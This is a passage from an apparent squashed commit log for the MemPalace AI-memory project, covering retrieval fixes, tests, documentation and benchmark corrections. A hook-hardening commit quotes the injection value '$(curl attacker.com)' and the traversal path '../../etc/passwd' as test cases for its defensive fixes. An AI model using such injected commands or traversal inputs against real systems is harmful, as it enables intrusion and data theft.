4.6 (1M context) <[email protected]> * feat: optional LLM-based closet regeneration — bring-your-own endpoint Adds mempalace/closet_llm.py as an OPTIONAL path for richer closet generation. Regex closets remain the default and cover the local-first promise; users who want LLM-quality topics can bring their own endpoint. Configuration (env or CLI flag): LLM_ENDPOINT — OpenAI-compatible base URL (required) LLM_KEY — bearer token (optional; local inference skips this) LLM_MODEL — model name (required) Works with Ollama, vLLM, llama.cpp servers, OpenAI, OpenRouter, and any other provider that speaks OpenAI-compatible /chat/completions. Zero new dependencies — uses stdlib urllib. Replaces the original Anthropic-SDK-hardcoded version of this module from Milla's branch (commit 935f657). Same prompt, same parsing, same regenerate_closets flow; only the transport was generalised so the feature doesn't lock users into a specific vendor or require API keys for core memory operations (CLAUDE.md, "Local-first, zero API"). Includes 13 unit tests covering config resolution, request shape, auth-header omission when no key is set, code-fence stripping, and missing-config error path. All mocked — zero network calls in tests. Co-Authored-By: MSL <[email protected]> * fix(search): hybrid closet+drawer retrieval — closets boost, never gate (#795) * Fix: set cosine distance metadata on all collection creation sites ChromaDB defaults HNSW index to L2 (Euclidean) distance, but MemPalace scoring uses 1-distance which requires cosine (range 0-2). Add metadata={"hnsw:space": "cosine"} to the 4 production and 3 test call sites that were missing it. Closes #218 * fix: sync version.py to 3.2.0 Commit 6614b9b bumped pyproject.toml to 3.2.0 but missed mempalace/version.py, breaking test_version_consistency on every PR's CI. This syncs them. * refactor: extract locked filing block to keep mine_convos under C901 Adding the per-file lock + double-checked file_already_mined() in the previous commit pushed mine_convos cyclomatic complexity from 25 to 26, just over ruff's max-complexity threshold. Hoist the locked critical section into _file_chunks_locked() so the outer loop stays within budget. No behavior change. * style: ruff format mempalace/palace.py Add blank lines after inline imports in mine_lock. Pure formatting. * fix(normalize): make strip_noise verbatim-safe and scope it to Claude Code JSONL The initial strip_noise() regressed on three fronts when audited against adversarial user content — each verified with executable repros against the cherry-picked code: 1. `<tag>.*?</tag>` with re.DOTALL span-ate across messages: one stray unclosed <system-reminder> anywhere in a session merged with the next closing tag, silently deleting everything between them (including full assistant replies). 2. `.*$ctrl\+o to expand$.*\n?` nuked entire lines of user prose whenever a user happened to document the TUI shortcut. 3. `Ran \d+ (?:stop|pre|post)\s*hook.*` with IGNORECASE ate the second sentence from "our CI has a stop hook ... Ran 2 stop hooks last week" — legitimate user commentary. These are unambiguous violations of the project's "Verbatim always" design principle. Fixes: - All tag patterns are now line-anchored (`(?m)^(?:> )?<tag>`) and their body forbids crossing a blank line (`(?:(?!\n\s*\n)[\s\S])*?`), so a dangling open tag cannot eat neighboring messages. - `_NOISE_LINE_PREFIXES` are line-anchored and case-sensitive — user prose mentioning "CURRENT TIME:" mid-sentence is preserved. - Hook-run chrome requires `(?m)^`, explicit hook names (Stop, PreCompact, PreToolUse, etc.), and no IGNORECASE. - "… +N lines" is line-anchored. - "(ctrl+o to expand)" only matches Claude Code's actual collapsed- output chrome shape `[N tokens] (ctrl+o to expand)`; a bare parenthetical in user prose stays intact. Scope: - `strip_noise()` is no longer called on every normalization path. Only `_try_claude_code_jsonl` invokes it, per-extracted-message — so Claude.ai exports, ChatGPT exports, Slack JSON, Codex JSONL, and plain text with `>` markers pass through fully verbatim. Per-message application also makes span-eating structurally impossible. Tests: - 15 new tests in test_normalize.py pin the boundary: 6 guard user content that must survive (each of the adversarial repros), 9 assert real system chrome is still stripped. All pass; full suite 702 pass (2 failures are the unrelated pre-existing version.py bug, cleared by #820). Known limitation (not fixed here): convo_miner.py does not delete drawers on re-mine, so transcripts mined before this PR keep noise- filled drawers until the user manually erases + re-mines. Proper fix needs a schema-version field on drawer metadata + re-mine trigger — out of scope for this PR. * feat(normalize): auto-rebuild stale drawers via NORMALIZE_VERSION schema gate Without this, the strip_noise improvement only helps new mines. Every user who had already mined Claude Code JSONL sessions would keep their noise-polluted drawers forever, because convo_miner's file_already_mined skip short-circuits before re-processing. Adds a versioned schema gate so upgrades propagate silently: - palace.NORMALIZE_VERSION=2 — bumped when the normalization pipeline changes shape (this PR's strip_noise is the v1→v2 bump). - file_already_mined now returns False if the stored normalize_version is missing or less than current, triggering a rebuild on next mine. - Both miners stamp drawers with the current normalize_version. - convo_miner now purges stale drawers before inserting fresh chunks (mirrors miner.py's existing delete+insert), extracted into _file_convo_chunks helper to keep mine_convos under ruff's C901 limit. User experience: upgrade mempalace, run `mempalace mine` as usual, old noisy drawers get silently replaced with clean ones. No erase needed, no "you need to rebuild" changelog footgun. Tests: - test_file_already_mined_returns_false_for_stale_normalize_version — pins the version gate contract for missing/v1/current. - test_add_drawer_stamps_normalize_version — fresh project-miner drawers carry the field. - test_mine_convos_rebuilds_stale_drawers_after_schema_bump — end-to-end proof that a pre-v2 palace gets silently cleaned on next mine, with orphan drawers purged and NOT skipped. Existing test_file_already_mined_check_mtime updated to include the new field; all other tests unaffected. * fix: stop hooks from making agents write in chat — save tokens The save hook and precompact hook were telling the agent to write diary entries, add drawers, and add KG triples IN THE CHAT WINDOW. Every line written stays in conversation history and retransmits on every subsequent turn — ~$1/session in wasted tokens. Fix: hooks now say "saved in background, no action needed" and use decision: allow instead of block. The agent continues working without interruption. All filing happens via the background pipeline. Also updated hooks README with: - Known limitation: hooks require session restart after install - Updated cost section: zero tokens, background-only Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use microsecond timestamp and full content hash in diary entry ID (#819) * fix: remove unused import 'main' from mempalace/__init__.py Removed the 'main' import from `mempalace/__init__.py` and updated `pyproject.toml` to point the script entry point directly to `mempalace.cli:main`. This ensures the CLI remains functional while improving code hygiene. Co-authored-by: igorls <[email protected]> * merge: full hardened stack + rewrite fact_checker around actual KG API Merges the full hardened stack (up through #791 drawer-grep) and turns fact_checker from "dead code hidden behind bare except" into an actually-working offline contradiction detector with tests. ## Dead paths the PR body advertised but the code never executed Both buried by a single outer ``except Exception: pass``: * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method; it has ``query_entity()``. The attribute error was silently swallowed and the entire KG branch always returned ``[]``. Now using ``kg.query_entity(subject, direction="outgoing")`` with proper handling of the ``predicate``/``object``/``current``/``valid_to`` fields the real API returns. * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only kwarg is ``db_path``. Passing ``palace_path`` raised TypeError, silently swallowed. Now computing the db_path correctly from ``<palace>/knowledge_graph.sqlite3``, matching the convention the MCP server already uses. ## Contradiction logic rewritten The previous ``if kg_pred in claim and fact.object not in claim`` only fired when text used the SAME predicate word as the KG fact — the exact opposite of the stated use case ("Bob is Alice's brother" when KG says husband" would NOT have fired). Replaced with a proper parse → lookup → compare pipeline: * ``_extract_claims`` parses two surface forms ("X is Y's Z" and "X's Z is Y") into ``(subject, predicate, object)`` triples. * ``_check_kg_contradictions`` pulls the subject's outgoing facts and flags two classes: - ``relationship_mismatch`` when a current KG fact matches the same ``(subject, object)`` pair but with a different predicate. - ``stale_fact`` when the exact triple exists but is ``valid_to``-closed in the past. * Stale-fact detection is now implemented (the PR body claimed it; the old code silently didn't implement it). ## Performance fix — O(n²) → O(mentioned × n) ``_check_entity_confusion`` previously computed Levenshtein for every pair of registered names on every ``check_text`` call. For 1,000 registered names that's ~500K edit-distance calls per hook invocation. Now we first identify which registry names actually appear in the text (single regex scan), then only compute edit distance between mentioned and unmentioned names. Pinned by a test that asserts <200ms on a 500- name registry with zero mentions. Also: when *both* similar names are mentioned in the text, we no longer flag them — the user clearly knows they're different people. ## Shared entity-registry loader ``mempalace/miner.py`` already had an mtime-cached loader for ``~/.mempalace/known_entities.json``. fact_checker had a duplicate implementation that leaked file handles and ignored caching. Extended miner's cache to expose both the flat set (``_load_known_entities``) and the raw category dict (``_load_known_entities_raw``); fact_checker now imports the latter. No more double disk reads, no more handle leak. ## Tests — 24 cases in tests/test_fact_checker.py All three detection paths + both dead-code regressions: * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the correct KG constructor signature so the ``palace_path=`` bug can't come back. * ``test_relationship_mismatch_detected`` — the headline example from the PR body now actually fires. * ``test_stale_fact_detected`` — valid_to-closed triple is flagged. * ``test_current_fact_same_triple_is_not_flagged`` — no false positive on a still-valid match. * ``test_performance_bounded_by_mentioned_names`` — 500-name registry, zero mentions, <200ms. Regression for the O(n²) blowup. * ``test_no_false_positive_when_both_names_mentioned`` — Mila and Milla in the same text is fine. * Plus claim extraction, flatten_names shapes, CLI exit code, empty text handling, missing-palace graceful fallback, registry-dict shape support. 785/785 suite pass. ruff + format clean on CI-pinned 0.4.x. * Optimize entity detection with regex caching and pre-compilation - Use functools.lru_cache to cache compiled patterns for entity names. - Pre-compile static pronoun patterns into a single regex. - Remove redundant .lower() calls in score_entity loop. Co-authored-by: igorls <[email protected]> * docs: fix stale milla-jovovich org URLs in website and plugin manifests (#787) Follow-up to #766 which covers version.py, pyproject.toml, README, CHANGELOG, and CONTRIBUTING. These 11 files still had the old org name in URLs: - website/ (VitePress config + 6 docs pages) - .claude-plugin/ (plugin.json repository, README marketplace command) - .codex-plugin/ (plugin.json URLs, README links) Author name fields are intentionally unchanged. * test: make diary state path assertion platform-neutral The Windows CI job failed on: assert '/.mempalace/state/' in str(state_path) because Windows uses ``\`` as the path separator, so the substring never matches. The behavior under test (state file lives outside the diary dir, under ``~/.mempalace/state/``) is already correct on both platforms — only the assertion was Unix-only. Switch to ``state_path.parent`` comparisons that work on any OS. * test: serialize mine_lock concurrency test with multiprocessing The macOS CI job failed ``test_lock_blocks_concurrent_access`` because ``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads in the same process both acquire even when they open their own file descriptors. The test passed on Linux (per-FD flock) and Windows (per-FD ``msvcrt.locking``) but was never actually exercising the lock's real contract. ``mine_lock`` is designed to serialize multi-*agent* access — i.e., separate processes, not threads. Switch the test to ``multiprocessing.get_context('spawn')`` with a module-level worker (so the spawn pickles cleanly) so it: 1. reflects the actual use case (one lock per mining process); 2. passes on all three OSes without flock-semantics branching; 3. catches real regressions (a broken lock would now let both processes through, exactly what we care about). Hold time bumped to 0.3s and the "wait until p1 acquires" delay to 0.2s to tolerate spawn's higher startup latency on macOS/Windows. * test: verify mine_lock via disjoint critical-section intervals The previous revision used multiprocessing but still relied on timing ("second process waited at least N seconds") which flakes on CI where spawn overhead eats into the hold window. Linux CI observed the second process report a 0.088s wait — below the 0.1s threshold — even though the lock behavior was correct; spawn was just slow enough that the first process had nearly finished holding when the second got past its own spawn. Switch to effect-based verification: each worker logs its [enter_time, exit_time] inside the critical section, and the test asserts the two intervals are disjoint after sorting. A broken lock would produce overlapping intervals regardless of spawn latency; a working lock cannot. Also removed the mp.Queue since we no longer pass timing data back. * Fix: ruff format with CI-pinned version (0.4.x) * fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835) * fix: README audit — match every claim to shipped code + add hall detection TDD audit: wrote 42 tests verifying README claims against codebase. Fixed all 7 failures: 1. Tool count: 19 → 29 (10 tools were undocumented) 2. Added tool table rows for tunnels, drawer management, system tools 3. Version badge: 3.1.0 → 3.2.0 4. dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers" 5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py) 6. pyproject.toml version in project structure: v3.0.0 → v3.2.0 7. Hall detection: added detect_hall() to miner.py — drawers now tagged with hall metadata so palace_graph.py can build hall connections New code: - miner.py: detect_hall() — keyword scoring against config hall_keywords, writes hall field to every drawer's metadata - tests/test_hall_detection.py — 12 TDD tests (written before code) - tests/test_readme_claims.py — 42 TDD tests verifying README accuracy 859/859 tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: resolve ruff lint — unused imports and variables Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * style: ruff format with CI-pinned 0.4.x Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: use conftest fixtures in hall tests for Windows compat Windows CI fails with NotADirectoryError when ChromaDB tries to write HNSW files in short-lived TemporaryDirectory. Use conftest palace_path and tmp_dir fixtures instead — same pattern as all other tests that touch ChromaDB. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: address Igor's review — convo_miner halls, cached config, markdown typo TDD: wrote tests for convo_miner hall metadata and config caching BEFORE verifying the code changes. 1. README markdown typo: extra ** in wake-up token row (line 195) 2. convo_miner.py: added _detect_hall_cached() — conversation drawers now get hall metadata (was missing, Igor caught it) 3. miner.py + convo_miner.py: cached hall_keywords at module level so config.json isn't re-read per drawer during bulk mine 4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching 861/861 tests pass. ruff clean. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> --------- Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * fix(website): update vitepress base url for custom domain * chore(release): bump version strings to 3.3.0 and curate CHANGELOG Prepare develop for the 3.3.0 release cycle. Version bumps: - mempalace/version.py: 3.2.0 -> 3.3.0 - pyproject.toml: 3.2.0 -> 3.3.0 - README.md: pyproject.toml label and shields.io badge - uv.lock: mempalace 3.0.0 -> 3.3.0 (also fills in resolved dev/extras) CHANGELOG.md: - Close out the stale [Unreleased] section as [3.2.0] - 2026-04-12 (v3.2.0 was tagged on that date but the release flip was never made) - Add a fresh [Unreleased] - v3.3.0 section covering the 49 commits since v3.2.0: closet layer, BM25 hybrid search, entity metadata, diary ingest, cross-wing tunnels, drawer-grep, offline fact checker, LLM-based closet regen, hall detection, cosine-distance fix, multi-agent locking, README audit, etc. - Adopt Keep a Changelog + SemVer framing - Add version compare reference links at the bottom - Fix stale milla-jovovich/mempalace preamble URL to MemPalace/mempalace --------- Co-authored-by: MSL <[email protected]> Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> Co-authored-by: eblander <[email protected]> Co-authored-by: shafdev <[email protected]> Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: mvalentsev <[email protected]> Co-authored-by: Dominique Deschatre <[email protected]> * ci: serve docs from develop only Docs deploy to GitHub Pages from develop for faster iteration cycles. Main was failing the deploy step with "Branch 'main' is not allowed to deploy to github-pages due to environment protection rules" on every release merge (v3.2.0, v3.3.0) — noise without signal, since docs weren't meant to serve from main anyway. Removes main from both the push trigger and the deploy-job guard. Develop continues to deploy as before; manual dispatch still works. * fix(status): paginate metadata fetch to support large palaces `col.get(limit=total)` causes SQLite "too many SQL variables" on palaces with >10k drawers (#802) and on older versions the hardcoded limit=10000 silently truncated the count (#850). Paginate in 5k batches using offset and aggregate wing/room counts incrementally. Also use `col.count()` for the header instead of `len(metas)` so the displayed total is always correct. Tested on a 122,686-drawer palace. Fixes #850 Related: #802, #723 * refactor: route all chromadb access through ChromaBackend Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract. Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules. * fix: update stale org URLs in pyproject.toml and README (#787) * fix: harden hooks against shell injection, path traversal, and arithmetic injection save_hook.sh: - Coerce stop_hook_active to strict True/False before eval to prevent command injection via crafted JSON (e.g. "$(curl attacker.com)") - Validate LAST_SAVE as plain integer with regex before bash arithmetic to prevent command substitution via poisoned state files hooks_cli.py: - Add _validate_transcript_path() that rejects paths with '..' components and non-.jsonl/.json extensions - _count_human_messages() now uses the validator, returning 0 for invalid paths instead of opening arbitrary files Tests: - Path traversal rejection (../../etc/passwd) - Wrong extension rejection (.txt, .py) - Valid path acceptance (.jsonl, .json) - Empty string handling - Shell injection in stop_hook_active field Refs: MemPalace/mempalace#809 * fix: add logging on rejected transcript paths and platform-native path test - _count_human_messages() now logs a WARNING via _log() when a non-empty transcript_path is rejected by the validator, making silent auto-save failures diagnosable via hook.log - Add test for platform-native paths (backslashes on Windows) to verify _validate_transcript_path works cross-platform - Add test verifying the warning log is emitted on rejection Refs: MemPalace/mempalace#809 * Increase visibility of fake website caution Noticed a URL ``` hXXps://www.mempalace[.]tech/ ``` Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README. * fix: use permissive validator for KG entity values (closes #455) sanitize_name rejects commas, colons, parentheses, and slashes — characters that commonly appear in knowledge graph subject/object values. Adds sanitize_kg_value for KG entity fields (subject, object, entity) while keeping sanitize_name for predicates and wing/room names. * chore: bump plugin manifests to 3.3.0 and fix owner URL Aligns marketplace.json and both plugin.json files with version.py / pyproject.toml (already at 3.3.0) so `/plugin update` reflects the v3.1.0/v3.2.0/v3.3.0 tags that had been landing without manifest bumps. Also updates marketplace.json `owner.url` from the stale github.com/milla-jovovich path to the current github.com/MemPalace org. Refs #874 * ci: add version guard to catch tag/manifest drift Fails a tag push if `vX.Y.Z` does not match `mempalace/version.py` (the single source of truth per CLAUDE.md), and fails PRs that touch any version file without keeping all five in sync (pyproject.toml, version.py, .claude-plugin/marketplace.json, .claude-plugin/plugin.json, .codex-plugin/plugin.json). Prevents the class of bug described in #874, where v3.1.0/v3.2.0/v3.3.0 tags all landed pointing at commits that still carried manifest version 3.0.14, blocking `/plugin update` for end users. Refs #874 * ci: let semver pre-release tags bypass strict manifest match Tags matching `vX.Y.Z-*` (e.g. v3.4.0-rc1, v1.0.0-beta.2) are treated as internal/staging builds. They skip the tag-vs-manifest check because pre-releases do not flow to end users via `/plugin update`, which reads the manifest on the default branch. Stable tags `vX.Y.Z` still require all five version sources to match exactly, so the protection against the #874 drift remains intact. The cross-file consistency check on PRs is unchanged — all manifests must still agree with mempalace/version.py whenever any version file moves. * fix: ship CNAME in Pages artifact to pin custom domain Adds website/public/CNAME containing `mempalaceofficial.com` so the VitePress build output always includes /CNAME in the Pages artifact. Without this, the custom-domain setting is only held in the repo's Pages API config — if it ever drifts (manual edit, org move, workflow change), the site reverts to <org>.github.io with no record in source. Note: this does not fix the current site outage. The root cause is DNS — mempalaceofficial.com has no A/AAAA/CNAME records pointing at GitHub Pages IPs. That has to be fixed at the registrar. This commit is the belt-and-suspenders so that once DNS is back, the domain is pinned in source and the next workflow refactor can't accidentally drop it. * docs: tighten SECURITY.md with real version policy and GHPVR-only channel Builds on @Yorji-Porji's draft by fixing three issues before it lands: - Replace the `< 1.0.0` placeholder table with MemPalace's actual support policy: current major (3.x) receives fixes, 2.x and earlier do not. - Remove the `[Insert Maintainer Email Here]` placeholder and the email fallback. GitHub Private Vulnerability Reporting is enabled on this repo; the policy points there exclusively so there is no risk of a researcher emailing a dead address. - Drop the meta-note ("Adjust the table above…") that was an instruction to the maintainer, not policy text. Structure, triage timelines, and credit language are kept as drafted. * fix: allow mining directories without local mempalace.yaml When no mempalace.yaml or mempal.yaml exists in the source directory, return a default config (wing = directory name, room = general) instead of calling sys.exit(1). This lets users mine any directory into their palace without requiring init first. Closes #14. * fix: remove unused sys import * fix: send missing-yaml warning to stderr and flag basename collisions Addresses review feedback on #604: - Warning now goes to stderr instead of stdout so it doesn't mix with mine progress output when users pipe stdout elsewhere. - Warning explicitly calls out that directories with the same basename will share a wing name, and suggests adding mempalace.yaml to disambiguate. Prevents silent content mixing across projects mined without yaml. * docs: name official domain and specific impostors in scam alert Replace the blanket ban on .tech/.io/.com domains with an allowlist of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com) and call out mempalace.tech as the reported impostor. The blanket .com ban would have flagged mempalaceofficial.com as fake once DNS resolves (CNAME shipped in #877). Also update the April 11 follow-up section to match so the two notices no longer contradict each other. * perf: optimize regex compilation in entity extraction Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution. Co-authored-by: igorls <[email protected]> * feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871) export MEMPAL_VERBOSE=true → hook blocks, agent writes diary in chat export MEMPAL_VERBOSE=false → silent background save (default) Developers need to see code and diaries being written. Regular users want zero chat clutter. Now both work. TDD: tests written first, failed, code fixed, tests pass. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]> * feat: add VSCode devcontainer matching CI environment Contributors now get a one-click dev environment that mirrors CI exactly: Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same >=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from the existing .pre-commit-config.yaml. Pinning ruff in post-create.sh is the load-bearing piece: pyproject only sets a floor, so without the pin the ruff extension would install 0.15.x and phantom-fail lint against CI's 0.4.x. * fix: add missing self._lock to query_relationship, timeline, stats in KnowledgeGraph * fix: replace invalid 'decision: allow' with {} in hooks Closes #872. The top-level decision field only recognizes "block". To not block, return empty JSON {}. "allow" was silently ignored by Claude Code, causing unpredictable behavior. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * fix: add missing self._lock to KnowledgeGraph.close() TDD: test first, failed, fixed, passed. Igor fixed query_relationship/timeline/stats in an earlier commit. close() was the last method touching self._connection without holding the lock. Closes #883. Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]> * benchmarks: add --llm-backend ollama for non-Anthropic rerank The rerank pipeline was hardcoded to Anthropic's /v1/messages. Add a backend flag so the same code path can be exercised with any OpenAI-compatible endpoint — local Ollama, Ollama Cloud, or any gateway that speaks /v1/chat/completions. Enables independent verification of the "100% with Haiku rerank" claim by running the full benchmark with a different LLM family (e.g. minimax-m2.7:cloud) and zero Anthropic dependency. Both longmemeval_bench.py and locomo_bench.py: - llm_rerank*() gain backend= / base_url= kwargs - CLI: --llm-backend {anthropic,ollama}, --llm-base-url - API key required only when backend=anthropic (diary/palace modes still require it) - Parse last integer in response (reasoning models emit multi-int output) - Fallback to message.reasoning when content is empty - Raise max_tokens to 1024 for reasoning models * benchmarks: apply ruff-format to llm_rerank (trivial line wrap) * benchmarks: add v3.3.0 reproduction results + 50/450 split Addresses #875: every internal BENCHMARKS.md claim reproduced on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings, seed=42 for the LongMemEval dev/held-out split). Scorecard — all reproduce exactly: LongMemEval raw R@5 96.6% (500/500) ✅ hybrid_v4 held-out 450 R@5 98.4% (442/450) ✅ hybrid_v4 + minimax rerank R@5 99.2% (496/500) * hybrid_v4 + minimax rerank R@10 100.0% (500/500) * LoCoMo (session, top-10) raw 60.3% (1986q) ✅ hybrid v5 88.9% (1986q) ✅ ConvoMem all-categories (250 items) 92.9% ✅ MemBench all-categories (8500) 80.3% ✅ * The minimax-m2.7:cloud rerank run replicates the "100%" claim with a different LLM family (no Anthropic dependency). R@10 is a perfect reproduction; R@5 misses 4 questions that the published Haiku run caught — consistent with BENCHMARKS.md's own disclosure that hybrid_v4 includes three question-specific fixes developed by inspecting misses, i.e. teaching to the test. The committed 50/450 split is the deterministic (seed=42) split BENCHMARKS.md references but wasn't previously in the repo. Full result JSONLs include every question, every retrieved id, and every score — auditable end-to-end. * docs: slim README and move corrections/notices to docs/HISTORY.md Addresses #875. The previous README was 755 lines mixing six purposes (scam alert, hero, two mea-culpa notes, install guide, architecture explainer, API reference, file map). Rework it as a pure entry point: what MemPalace is, how to install, honest benchmark numbers, links to the website for concept/architecture documentation. Key content changes: - Drop the "highest-scoring AI memory system ever benchmarked" framing. - New tagline: "Local-first AI memory. Verbatim storage, pluggable backend, 96.6% R@5 raw on LongMemEval — zero API calls." Avoids naming a specific vector-store implementation since the backend is pluggable (see mempalace/backends/base.py). - Remove the cross-system comparison table. Retrieval recall (R@5) and end-to-end QA accuracy are different metrics and are not comparable; placing MemPalace's R@5 next to competitor QA accuracy under a single column header was a category error. - The "100%" LongMemEval headline is no longer the lead. The honest held-out figure is 98.4% R@5 on 450 unseen questions. The rerank pipeline reaches >=99% with any capable LLM (reproduced with Claude Haiku, Sonnet, and minimax-m2.7 via Ollama) — pipeline-level, not model-specific. - Benchmark reproduction commands now reference the correct repo (MemPalace/mempalace, not the defunct aya-thekeeper/mempal branch). New file: docs/HISTORY.md as the canonical home for post-launch corrections, public notices, and retractions. Contains verbatim: - 2026-04-14 note on this rewrite (links to #875) - 2026-04-11 impostor-domain notice (moved from README header) - 2026-04-07 "A Note from Milla & Ben" (moved from README body) README keeps a one-line scam-alert callout that links to docs/HISTORY.md for the full timeline. * docs(website): align mempalaceofficial.com with honest benchmarks Part of #875. Bring the VitePress site into line with the new README and the reproducibility scorecard: drop category-error comparisons, drop retracted claims, retain only metrics and caveats that survive audit. website/index.md - New tagline matches README (local-first, verbatim, pluggable backend, 96.6% R@5 raw, zero API calls). - Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra 94.87% / Mem0 ~85%" comparison table with a single honest table showing MemPalace's own retrieval-recall numbers (raw 96.6%, hybrid v4 held-out 98.4%). Add an explicit sentence explaining why we no longer publish a cross-system table on the landing page (retrieval recall vs QA accuracy are different metrics). - Soften the "ChromaDB-powered vector search" feature blurb to be backend-agnostic, since the retrieval layer is pluggable. website/reference/benchmarks.md - Full rewrite of the retrieval-recall tables. No more "100%" headline; honest held-out 98.4% R@5 replaces it. Added the model-agnostic rerank result (99.2% R@5 / 100% R@10 with minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific. - Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row. With per-conversation session counts of 19-32 and top_k=50, the retrieval stage returns every session by construction — the number measures an LLM's reading comprehension, not retrieval. - Drop the cross-system comparison tables. Link out to each project's own research page (Mastra, Mem0, Supermemory) for their published numbers and metric definitions. - Rewrite reproduction commands to use the correct repository and demonstrate the new --llm-backend ollama flag. website/concepts/the-palace.md - Remove the "+34%" row / paragraph. Wing/room filtering is standard metadata filtering in the vector store, not a novel retrieval mechanism — the April-7 note already retracted that framing; this finishes the retraction on the website where it had remained. website/guide/searching.md - Same treatment for "34% retrieval improvement". Reframe as operational scoping, not a novel boost. website/reference/contributing.md - Update the "palace structure matters" bullet to reflect the same framing: scoping-not-magic. website/concepts/knowledge-graph.md - Replace the MemPalace-vs-Zep feature matrix with a short "related work" note that links to Zep's own documentation for authoritative details on their deployment model. Avoids claims we cannot verify at source. * docs: #875 follow-up — repo surfaces + reproduction URLs + CHANGELOG Remaining in-repo surfaces carrying the same retracted or broken claims as the public pages fixed in the previous two commits. CONTRIBUTING.md - "Palace structure matters ... 34% retrieval improvement" → reframed as scoping (same rewording applied to the website equivalents). benchmarks/BENCHMARKS.md - Add a prominent "Important caveat" block at the top of the "Comparison vs Published Systems" table explaining that R@5 (retrieval recall) and QA accuracy are different metrics, with citations to Mastra, Mem0, and Supermemory's own published methodology pages. Annotate the specific competitor rows whose numbers are QA accuracy, not retrieval recall. - Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4 → 100 step was tuned on 3 specific wrong answers (already disclosed further down in the doc under "Benchmark Integrity"); the honest hybrid figure is held-out 98.4%. - Fix the broken clone URL — `aya-thekeeper/mempal` no longer points at anything; now `MemPalace/mempalace`. benchmarks/README.md + benchmarks/HYBRID_MODE.md - Same clone-URL fix applied. CHANGELOG.md - Add a ### Documentation entry under [Unreleased] v3.3.0 that names #875 and summarises the scope of the rewrite. * docs+tests: fix CI after README slim (#875) The regression-guard tests added in #835 were pinned to the old README shape (tool table + file-reference table). When #897 slimmed the README and moved that content to the website, three tests started failing: TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict TestNoUnlistedTools.test_no_undocumented_tools TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless Changes in this commit: 1. Update the 3 tests to track the new canonical docs surfaces - Tool list -> website/reference/mcp-tools.md (tests parse `### \`mempalace_xxx\`` headings instead of markdown table rows). - dialect.py lossless disclaimer -> website/reference/modules.md (any line mentioning dialect.py must not also say "lossless"). 2. Fix the website to make "no undocumented tools" true Add the 10 tools that existed in TOOLS but were missing from website/reference/mcp-tools.md (create_tunnel, delete_tunnel, follow_tunnels, list_tunnels, get_drawer, list_drawers, update_drawer, hook_settings, memories_filed_away, reconnect). Page header now correctly says "all 29 MCP tools". 3. Align pre-commit ruff pin to match CI (0.4.x) .pre-commit-config.yaml was pinning ruff v0.9.0, while .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two formatters produce incompatible output (e.g. v0.9.0 reformats `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects), which would cause the pre-commit hook to modify files that CI then flags as unformatted. Pinning the hook to v0.4.10 keeps the dev loop and CI in lock-step. Full suite: 887 passed, 0 failed. * fix: address i18n review issues from PR #718 Three issues flagged by bensig on the i18n PR before merge: 1. ko.json: status_drawers used {drawers} instead of {count}, causing the Korean UI to show the raw template string instead of the actual drawer count. All other 7 languages use {count}. 2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py with a sys.path.insert hack. Moved to tests/test_i18n.py per the project convention in AGENTS.md. 3. Dialect.from_config() passed lang=config.get("lang") which defaults to None, causing __init__ to inherit whatever language was loaded earlier via module-level state. Now defaults to "en" explicitly so from_config is deterministic regardless of prior load_lang() calls. Added two regression tests for the ko.json fix and the state leak. * docs(cli): clarify that 'mempalace init' requires <dir> (#210) (#862) Fixes #210. The CLI requires a positional <dir> argument. Previous docs emphasized that init 'sets up ~/.mempalace/' which misled users into expecting no arguments. Now the docs show <dir> is required, offer '.' as the usage for the current directory, and reword the description so the project-directory scan is listed first. * fix: make entity_registry.research() local-only by default (#811) * fix: make entity_registry.research() local-only by default research() previously called _wikipedia_lookup() unconditionally, sending entity names to en.wikipedia.org on every uncached lookup. This violates the project's local-first and privacy-by-architecture principles documented in CLAUDE.md. Changes: - research() now returns "unknown" for uncached words by default - New allow_network=True parameter required for Wikipedia lookups - Wikipedia 404 now returns "unknown" instead of asserting "person" with 0.70 confidence, preventing entity registry poisoning - Added privacy warning docstring to _wikipedia_lookup() - Added tests for local-only default, opt-in 